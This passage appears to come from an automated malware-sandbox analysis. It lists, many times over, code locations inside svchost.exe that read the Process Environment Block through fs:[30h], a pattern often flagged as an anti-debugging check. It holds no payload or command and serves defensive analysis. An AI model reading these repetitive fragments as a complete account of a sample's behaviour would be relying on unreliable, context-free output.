                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]2_2_03AB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]2_2_03AD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]2_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]2_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]2_2_03AF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]2_2_03A2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]2_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]2_2_03AC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]2_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]2_2_03A3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03A2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]2_2_03A380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]2_2_03AB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03A2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]2_2_03A720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]2_2_03AB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]2_2_03A2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]2_2_03A2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]2_2_03AC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]2_2_03AB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]2_2_03A5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]2_2_03A32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]2_2_03AB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]2_2_03A307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]2_2_03AE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]2_2_03AD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]2_2_03ABE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]2_2_03AB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]2_2_03ABE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
